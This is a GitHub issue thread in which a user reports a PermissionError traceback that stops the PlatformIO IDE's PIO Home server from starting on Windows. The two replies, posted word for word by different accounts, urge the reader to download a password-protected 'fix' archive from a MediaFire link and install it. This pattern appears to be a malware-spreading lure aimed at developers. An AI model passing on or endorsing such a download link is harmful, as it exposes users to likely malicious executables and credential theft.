platformio/platformio-vscode-ide #4113: Start PIO Home Server

Adamnz87, 2024-08-31:
%23 Description of problem
  Leave a comment...

  BEFORE SUBMITTING, PLEASE SEARCH FOR DUPLICATES IN
  - https://github.com/platformio/platformio-vscode-ide/issues%3Fq=is%3Aissue 

  %23 Configuration

  VSCode: 1.92.2
  PIO IDE: v3.3.3
  System: Windows_NT, 10.0.19045, x64

  %23 Exception
  ```
  Error: PermissionError: Traceback (most recent call last):
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\__main__.py", line 103, in main
    cli()  %23 pylint: disable=no-value-for-parameter
    ^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\cli.py", line 85, in invoke
    return super().invoke(ctx)
           ^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\core.py", line 1685, in invoke
    super().invoke(ctx)
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\core.py", line 783, in invoke
    return __callback(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\click\decorators.py", line 33, in new_func
    return f(get_current_context(), *args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\__main__.py", line 56, in cli
    maintenance.on_cmd_start(ctx, caller)
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\maintenance.py", line 38, in on_cmd_start
    after_upgrade(ctx)
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\maintenance.py", line 153, in after_upgrade
    cleanup_content_cache("http")
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\cache.py", line 164, in cleanup_content_cache
    with ContentCache(namespace) as cc:
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\cache.py", line 36, in __enter__
    self.delete()
  File "C:\Users\Adam\.platformio\penv\Lib\site-packages\platformio\cache.py", line 132, in delete
    with open(self._db_path, mode="w", encoding="utf8") as fp:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied: 'C:\\Users\\Adam\\.platformio\\.cache\\http\\db.data'

============================================================

An unexpected error occurred. Further steps:

* Verify that you have the latest version of PlatformIO using
  `python -m pip install -U platformio` command

* Try to find answer in FAQ Troubleshooting section
  https://docs.platformio.org/page/faq/index.html

* Report this problem to the developers
  https://github.com/platformio/platformio-core/issues

============================================================

	at c:\Users\Adam\.vscode\extensions\platformio.platformio-ide-3.3.3-win32-x64\node_modules\platformio-node-helpers\dist\index.js:1:11001
	at ChildProcess.i (c:\Users\Adam\.vscode\extensions\platformio.platformio-ide-3.3.3-win32-x64\node_modules\platformio-node-helpers\dist\index.js:1:4621)
	at ChildProcess.emit (node:events:519:28)
	at ChildProcess.emit (node:domain:488:12)
	at maybeClose (node:internal/child_process:1105:16)
	at ChildProcess._handle.onexit (node:internal/child_process:305:5)
  ```

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

closed 2024-08-31 by Adamnz87